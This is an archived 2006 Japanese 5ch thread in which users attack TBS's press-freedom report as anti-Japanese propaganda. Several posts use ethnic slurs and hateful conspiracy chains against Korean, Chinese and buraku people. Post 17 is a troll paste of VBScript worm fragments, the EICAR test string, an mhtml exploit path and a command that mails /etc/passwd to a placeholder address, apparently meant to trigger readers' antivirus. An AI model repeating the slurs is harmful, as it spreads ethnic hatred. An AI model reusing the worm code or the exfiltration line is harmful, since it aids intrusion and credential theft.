5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

TBSの偏向報道見た?

1 :Ψ:2006/10/27(金) 23:42:34.85 ID:ughmgXeS0
報道の自由について「国境無き記者団」←こいつらの発表をソースにすんじゃねーよ

2 :Ψ:2006/10/27(金) 23:43:18.75 ID:PCNlxG3b0
香ばしい反日洗脳番組でしたw

3 :Ψ:2006/10/27(金) 23:43:42.58 ID:BHpxojZl0
>>1
もそっと詳しくキボヌ

4 :Ψ:2006/10/27(金) 23:43:55.84 ID:nV4KimWv0
洗脳BGMが流れてた

5 :Ψ:2006/10/27(金) 23:44:26.39 ID:gALc3WxP0
何が目的なんだろうね。日本は不自由な国です、
とでもいいたいのかしら。

6 :Ψ:2006/10/27(金) 23:44:53.60 ID:hoDIB31M0
>>1
見てない。からもそっとkwsk

7 :Ψ:2006/10/27(金) 23:44:54.85 ID:236Baf9Y0
見た見た 欧州は日本を右傾化してると根強く見ている んだって 

ソースはTBS記者の感想かな

8 :Ψ:2006/10/27(金) 23:45:20.23 ID:4vp6/WFG0
いつものことだそ?

9 :Ψ:2006/10/27(金) 23:45:26.73 ID:ughmgXeS0
>>3
日本の自由度が下がったことについて韓国の中央日報の人にいちいち聞いてケチつけてた

10 :Ψ:2006/10/27(金) 23:45:37.12 ID:gi+x5lbc0
毎日新聞の2ちゃん同和削除ネタも
偏向した世論誘導報道じゃね?

11 :Ψ:2006/10/27(金) 23:46:51.88 ID:sDRpwksf0
富田メモを日本で一番たたいたのは
2chだろ
2chは敵みたいだぜ

12 :Ψ:2006/10/27(金) 23:46:59.48 ID:4CznvtuE0
G8で日本より低いのは飴と炉だけって言っていたけど、
安保常任理事国の五カ国のうち3カ国(飴、炉、支那)が日本より下だって。
日本は常任理事国じゃないけどね。
つーか、支那が一発で変換できんかった。

13 :Ψ:2006/10/27(金) 23:48:25.07 ID:Dy8RKNJL0
記者クラブはスルー?

14 :Ψ:2006/10/27(金) 23:48:49.83 ID:hspMMQun0
吐き気がしたから、12chに変えた。

15 :Ψ:2006/10/27(金) 23:49:29.72 ID:ughmgXeS0
>>14
俺もw

16 :Ψ:2006/10/27(金) 23:49:42.36 ID:YvJigeeM0
この時間はナイトスクープだろ

17 :Ψ:2006/10/27(金) 23:51:55.22 ID:Cww2mJrD0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub

18 :Ψ:2006/10/27(金) 23:55:19.18 ID:tIUJ+cqk0
洗脳BGMひど杉。

しかも日経が攻撃されたってアフォか?
誰のものかすらわからないようなメモを引っ張り出しプロパガンダ
あんなものを出す新聞社に疑問の声が上がるのは当然。
あれを擁護してたジャーナリストも所詮あの程度なんだろうね

19 :Ψ:2006/10/27(金) 23:56:04.21 ID:hPn2u2Uu0
暴力団・・右翼団体・・皇室・・
これが筑紫の報道の自由を侵しているみたいです(笑)
2ちゃんにいるひとは、怒りながら笑いながら見ていたと思うけど
なんも知らない人はどんどん洗脳されていく・・
ああ・・暴力団と右翼団体って同じようなもんなんだ・・って。
右翼とか右傾化と言う言葉に拒否反応示すようになちゃうよね・・

20 :Ψ:2006/10/28(土) 00:02:37.80 ID:/D0cmZbR0
世界に衝撃を与えた先日の中国軍によるチベット少年僧侶射殺事件を
まったく取り上げないテレビマスゴミにはどう見ても報道の自由はないな

21 :Ψ:2006/10/28(土) 00:07:13.11 ID:4dpvXUH/0
でも日本にタブーが多すぎるのも事実だよ

  部落問題、市民団体の思想的背景とその構成民族、日教組の主体思想勉強会、募金活動の収支、暴力団構成員の国籍

  特定国籍の犯罪者に体する報道姿勢 etc...

22 :Ψ:2006/10/28(土) 00:08:36.41 ID:0PzqZl+k0
>ああ・・暴力団と右翼団体って同じようなもんなんだ・・って

同じだろーがよw

23 :Ψ:2006/10/28(土) 00:10:23.08 ID:q8/v+5Ei0
>>13-15
後半で多少記者クラブに触れた。
だがなんか微妙。
外国人記者の記者クラブに対する感想がちょろっとだけ。

ていうか筑紫の
記者クラブが有る限り順位が上がることはないとかなんとか
のコメントがちょっと意外だったw


24 :Ψ:2006/10/28(土) 00:14:07.65 ID:Vx0xkMvS0
どのマスゴミも報道の自由とか言うけど、「日中記者交換協定」とか言うヤツ?
あれを有難がって守っているようじゃどのクチで「報道の自由」って言ってんのって感じだよ。
本当に報道の自由を謳いたいなら、まずコレを打ち破ってからにしろ。
それとも中国様の情報統制はきれいな統制って言うのか?

25 :Ψ:2006/10/28(土) 00:17:44.18 ID:ypQw1usN0
ネラーはTBSの味方ですよ そうだろ見んな

26 :Ψ:2006/10/28(土) 00:17:45.01 ID:u7uV+7cr0
実態 暴力団=右翼=在日チョン=南チョン=スリ団=日本潜入北スパイ=北チョン=シナ指示
=シナ

27 :Ψ:2006/10/28(土) 00:24:36.13 ID:bH/j9D+q0
確かに自由がなさすぎだ!
層化と公明の宗教分離を追及しろよ!
部落の圧力や嫌がらせだってすごいんだろ?
マスゴミだけをマスコミする組織も作って欲しい!!


28 :Ψ:2006/10/28(土) 00:27:34.64 ID:o8q03fmk0
福岡のいじめが他殺だったことをちゃんと報道しろ!
街道に屈しやがって。


29 :Ψ:2006/10/28(土) 00:29:39.33 ID:mezoKz/Y0
報道の自由度って法律とかでの判断でないの?
確かに日本の馬鹿マスコミはタブーが多いが、それはスポンサーがある企業だとどの国でも
同じだろ。 構造の問題。

大手マスコミじゃなかったり、信念ある奴らは自由に報道できるじゃん、日本。 
どこかの圧力があるとしてもそれは国じゃないだろ

30 :Ψ:2006/10/28(土) 00:32:58.38 ID:6eINx9MY0
トップニュースできてたな。
右翼の圧力のせいで自由な報道できないと外国人に言わせてた。

左翼勢力はスルーなのが興味深いね。

31 :Ψ:2006/10/28(土) 00:40:44.12 ID:/MMAtfkcO
奈良の税金泥棒の件をアレの仕業だって畜死が報道できないのは右傾化のせいですか?
右傾化のせいですかぁ〜?
あ〜?返事がねーぞ?ブサヨクw

32 :Ψ:2006/10/28(土) 00:45:39.18 ID:ii329NAS0
一日一件捏造偏向報道T朝鮮B暴力団S創価学会

33 :Ψ:2006/10/28(土) 00:45:56.13 ID:b2o1TzGH0
ヒント

        レコード大賞審査委員長の変死・・・・・・






34 :Ψ:2006/10/28(土) 00:53:50.94 ID:UmCc+1Vb0
23は常に偏向報道だろ

35 :Ψ:2006/10/28(土) 01:01:48.85 ID:nA9cJ/8g0
報道の自由って、偏向報道できるってことだろwwwwww
自由に出来事を選び、自由気ままに評論すること(つごうが悪いことは報道しないw)
そんな風なマスゴミが日本にはゴミのごとくいるってこった。





36 :Ψ:2006/10/28(土) 01:08:08.60 ID:jiJR67jP0
確かにwwwwww
やりたい放題だもんな

37 :Ψ:2006/10/28(土) 01:10:29.60 ID:XHVNQJ/A0
>33 もうちょい説明してけれ。

38 :Ψ:2006/10/28(土) 01:12:31.62 ID:Fnp/BAZc0
TBS不視聴運動実施中


39 :Ψ:2006/10/28(土) 01:18:18.02 ID:onNkAo820
TBSの、在日占有率は?


40 :Ψ:2006/10/28(土) 02:54:09.24 ID:e7vl59dS0
>>1
でも国境なき記者団は、台湾を中国と同じ色には塗っていないよ。
チベットも別扱いだし。ウフフ

41 :Ψ:2006/10/28(土) 03:17:17.72 ID:o8q03fmk0
>>34
そう。見ていていつもいやになる。こんなのは
報道番組といえないように思える。


42 :Ψ:2006/10/28(土) 05:10:53.66 ID:tNMyR5wf0
TBSは反日色を堂堂と打ち出している
朝鮮人が幹部の創価に乗っ取られている証拠

43 :Ψ:2006/10/28(土) 05:12:15.13 ID:dnlLBtJH0

TBS企画部門との会合に出たことあるが、
やたらオバハンが幅をきかせてた。

在日と言うより、その派生の社民に見えた。

44 :Ψ:2006/10/28(土) 05:39:22.01 ID:Rb7hR86z0
2ちゃん避難者の総合掲示板
http://jbbs.livedoor.jp/news/3530/

これ作ったから、テレビ実況とか好きなように使って

45 :Ψ:2006/10/28(土) 08:37:04.51 ID:s88iDx8T0


9 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)